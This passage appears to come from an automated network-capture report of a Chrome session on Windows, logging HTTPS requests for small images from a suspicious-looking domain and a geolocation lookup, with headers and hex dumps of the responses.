                              2024-02-22 07:09:40 UTC3312INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 07 08 05 06 09 03 04 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 02 03 06 07 00 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 9d c1 36 9f 1e df 15
                              Data Ascii: JFIFCC<<6
                              2024-02-22 07:09:40 UTC995INData Raw: e8 23 ba 1c ad a0 19 21 1f 14 12 d3 90 8a b8 4e 5a a2 03 45 22 0d c5 f3 42 79 2f a4 13 f6 92 99 00 0a f5 46 46 5e 63 5b ec a0 bd b5 68 a4 c1 a1 89 d9 33 85 9a 70 e7 9a 15 32 00 ea 57 a8 88 27 75 32 0d 8d bc df 5d 05 4f f0 89 12 6e 4c 98 58 3f 10 7e e9 8f a2 10 01 a0 fb ab e4 75 d8 e5 ee 20 85 88 0b 85 60 c0 31 ba b4 4f e3 74 f7 09 30 00 24 5e d6 b9 4f 87 35 8d e3 cc 97 46 ba 94 e0 1d 3c c4 89 20 5c 6c 04 59 61 b9 d4 b8 79 68 b9 ca 57 a5 b6 1a 79 09 43 97 45 86 03 bb 74 4d 93 0d 3b 48 06 14 f3 06 cd 77 45 d6 1f a8 af ff c4 00 23 11 00 02 03 00 02 03 00 02 03 01 00 00 00 00 00 00 02 03 01 04 05 00 11 06 12 13 14 21 10 15 23 31 ff da 00 08 01 03 01 01 08 00 1d bb 3e df b5 ee f6 33 27 1e 40 5e b3 3c 57 90 21 83 33 31 78 21 12 d8 8f 26 a3 03 dc 8f 93 64 48 76
                              Data Ascii: #!NZE"By/FF^c[h3p2W'u2]OnLX?~u `1Ot0$^O5F< \lYayhWyCEtM;HwE#!#1>3'@^<W!31x!&dHv


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.449771185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC745OUTGET /media/mainstream/all/ab/fr5.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 3043
                              Connection: close
                              ETag: "7f103bc91a8084cd154189b5ebb2cf86"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB709E6DFB5
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223402#123743329/gid:0/gname:root/mode:33279/mtime:1653412324#705054000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.705054Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3043INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 00 03 00 00 00 00 00 00 00 00 00 00 06 08 05 07 09 03 01 04 0a ff c4 00 1d 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 00 01 02 07 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 cf 18 cc
                              Data Ascii: JFIFCC<<


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.449770185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC376OUTGET /media/mainstream/all/ab/fr2.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 2815
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "9b63ccbd631923743813e838190cecbf"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB706F2EAC3
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#847577324/gid:0/gname:root/mode:33279/mtime:1653412324#505053000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.505053Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC2815INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 08 03 04 05 02 09 01 ff c4 00 1c 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 00 07 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 89 de 27 9b
                              Data Ascii: JFIFCC<<'


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.449775136.243.216.2354433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC367OUTGET /ExtService.svc/getextparams HTTP/1.1
                              Host: jsontdsexit2.com
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC213INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: application/json; charset=utf-8
                              Content-Length: 646
                              Connection: close
                              Vary: Accept-Encoding
                              Access-Control-Allow-Origin: *
                              2024-02-22 07:09:40 UTC646INData Raw: 7b 22 63 63 22 3a 22 55 53 22 2c 22 63 6e 61 6d 65 73 22 3a 7b 22 64 65 22 3a 22 55 53 41 22 2c 22 65 6e 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 65 73 22 3a 22 45 73 74 61 64 6f 73 20 55 6e 69 64 6f 73 22 2c 22 66 72 22 3a 22 c3 89 74 61 74 73 20 55 6e 69 73 22 2c 22 6a 61 22 3a 22 e3 82 a2 e3 83 a1 e3 83 aa e3 82 ab 22 2c 22 70 74 2d 42 52 22 3a 22 45 55 41 22 2c 22 72 75 22 3a 22 d0 a1 d0 a8 d0 90 22 2c 22 7a 68 2d 43 4e 22 3a 22 e7 be 8e e5 9b bd 22 7d 2c 22 63 69 74 79 22 3a 7b 22 64 65 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 65 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 65 73 22 3a 22 4e 75 65 76 61 20 59 6f 72 6b 22 2c 22 66 72 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6a 61 22 3a 22 e3 83 8b e3 83 a5 e3 83 bc e3
                              Data Ascii: {"cc":"US","cnames":{"de":"USA","en":"United States","es":"Estados Unidos","fr":"tats Unis","ja":"","pt-BR":"EUA","ru":"","zh-CN":""},"city":{"de":"New York City","en":"New York","es":"Nueva York","fr":"New York","ja":"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.449772185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC377OUTGET /media/mainstream/all/ab/like.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC782INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 357
                              Connection: close
                              ETag: "17586a0aeb3f7b2aa7fb15a9251fbcd4"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB7099AAD43
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223402#375743896/gid:0/gname:root/mode:33279/mtime:1653412329#505064000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:09.505064Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC357INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0f 00 00 00 0e 08 03 00 00 00 c7 54 b6 dd 00 00 00 81 50 4c 54 45 00 00 00 ff ff ff 00 00 30 5c 6d a0 8f 93 a9 7f 84 9f 8f 92 ab 3b 48 83 00 00 69 d0 d1 db c5 c7 d2 1d 41 8a ff ff ff 54 62 95 ab af bd 3d 4b 85 75 7a 9b 59 60 8d 3c 49 85 46 52 85 35 44 7f 00 00 46 00 38 86 7a 7e 9c 5d 6b 9d 8e 92 a9 9e a1 b2 a9 ac bb 98 9b b2 7f 83 9e 3e 4c 86 00 26 77 22 35 7c f9 f9 fb ef f0 f2 50 63 9d f1 f2 f7 d5 d6 e0 67 78 ad 56 69 a5 45 5c 9b e4 e5 eb b1 b4 c5 49 76 14 62 00 00 00 21 74 52 4e 53 00 fe 13 f8 b9 b0 9a 72 46 fe fe fd f7 f2 f1 a2 91 7c 78 62 45 3c fb ed df d5 cb ca b5 a1 94 85 69 22 e3 23 a0 00 00 00 72 49 44 41 54 08 d7 75 cb d9 0e 82 40 0c 85 61 ce 38 a3 a0 b2 28 e0 ca 56 76 78 ff 07 a4 4d 20 81
                              Data Ascii: PNGIHDRTPLTE0\m;HiATb=KuzY`<IFR5DF8z~]k>L&w"5|PcgxViE\Ivb!tRNSrF|xbE<i"#rIDATu@a8(VvxM


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.449774185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC376OUTGET /media/mainstream/all/ab/fr1.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 2939
                              Connection: close
                              ETag: "4c88ebf87b0cc26121497de03db7f64a"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB70CFB14A2
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#272024543/gid:0/gname:root/mode:33279/mtime:1653412324#385053000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.385053Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC2939INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 07 08 04 05 06 09 03 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 02 03 06 07 01 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 58 54 39 f3 b6 a1 f1
                              Data Ascii: JFIFCC<<XT9


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.449773185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC376OUTGET /media/mainstream/all/ab/fr3.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 3601
                              Connection: close
                              ETag: "c74a5befd416e24626972e88ed65526d"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB70D11D572
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223402#115743311/gid:0/gname:root/mode:33279/mtime:1653412324#581053000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.581053Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3312INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 08 06 07 05 09 00 04 0a 01 ff c4 00 1c 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 05 04 06 07 02 01 00 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 89 79 28 67
                              Data Ascii: JFIFCC<<y(g
                              2024-02-22 07:09:40 UTC289INData Raw: 63 bc 20 6a 21 22 1e 66 ea c4 23 a9 3a 80 ab 5b 73 2a cf f5 28 5a fe 01 8a 1f ea 0b cc 90 c5 5d 26 dc 2d 23 fc 8d 88 f2 33 08 98 93 aa 33 eb cb 2d 2b 1d d2 6f 6f ee 1b 88 96 58 42 82 6f 61 fe a4 f2 3b a5 50 a9 65 b2 f1 5b 27 42 f9 03 63 ed b6 62 a1 43 95 ea 04 29 a9 8b 25 67 65 01 90 7f 23 b8 89 ba 5c d5 1a aa b9 57 c7 d4 93 ec 47 04 78 22 08 d2 a2 2d 09 6d 4b d4 a1 c6 f0 d3 9e ba bd 22 90 09 16 1c 0b f7 30 c4 cc ed 35 fd 4d a8 a1 63 90 48 3f 11 d2 95 d9 fa 94 a7 f3 c7 ab a7 04 ec 7e 3b 8c f9 82 ca 67 65 90 b4 9c 8c 03 cd bb 18 5f aa ca bc 88 ea f6 9a 9e a4 99 b1 60 f3 64 64 ee 41 b8 b4 2e 61 4a 3a 93 c8 84 3a b4 bc b3 ce 62 94 94 bc f2 fd 41 7b 8e 62 61 01 b7 94 91 c1 3f 06 3f 4c a6 df 97 af 14 20 fd 2b 4e 47 06 c6 e2 25 da 6c 87 13 6c 64 fc c4 ea 13 a1
                              Data Ascii: c j!"f#:[s*(Z]&-#33-+ooXBoa;Pe['BcbC)%ge#\WGx"-mK"05McH?~;ge_`ddA.aJ::bA{ba??L +NG%lld


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.449776185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC745OUTGET /media/mainstream/all/ab/fr6.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 2814
                              Connection: close
                              ETag: "f17d127dfcaa6f94929eedd080276df0"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB719F4863E
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#272024543/gid:0/gname:root/mode:33279/mtime:1653412324#765054000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.765054Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC2814INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 01 02 02 02 02 03 02 02 03 03 06 04 03 03 03 03 07 05 05 04 06 08 07 09 08 08 07 08 08 09 0a 0d 0b 09 0a 0c 0a 08 08 0b 0f 0b 0c 0d 0e 0e 0f 0e 09 0b 10 11 10 0e 11 0d 0e 0e 0e ff db 00 43 01 02 03 03 03 03 03 07 04 04 07 0e 09 08 09 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 09 06 08 03 04 05 02 0a ff c4 00 1b 01 00 01 04 03 00 00 00 00 00 00 00 00 00 00 00 00 04 02 03 05 06 00 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 74 3b d2 4b 14
                              Data Ascii: JFIFCC<<t;K


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.449777185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC746OUTGET /media/mainstream/all/ab/fr11.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:41 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 3157
                              Connection: close
                              ETag: "752f51c4c387c0ca7f4337acdeec15d6"
                              Last-Modified: Tue, 21 Nov 2023 12:30:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB71BC9E5CD
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223402#107743292/gid:0/gname:root/mode:33279/mtime:1653412324#445053000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.445053Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:41 UTC3157INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 01 02 02 02 02 03 02 02 03 03 06 04 03 03 03 03 07 05 05 04 06 08 07 09 08 08 07 08 08 09 0a 0d 0b 09 0a 0c 0a 08 08 0b 0f 0b 0c 0d 0e 0e 0f 0e 09 0b 10 11 10 0e 11 0d 0e 0e 0e ff db 00 43 01 02 03 03 03 03 03 07 04 04 07 0e 09 08 09 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 06 08 09 04 03 02 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 00 02 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a7 f9 e3 2d 9f 09
                              Data Ascii: JFIFCC<<-


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.449778185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC380OUTGET /media/mainstream/all/ab/top_red.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
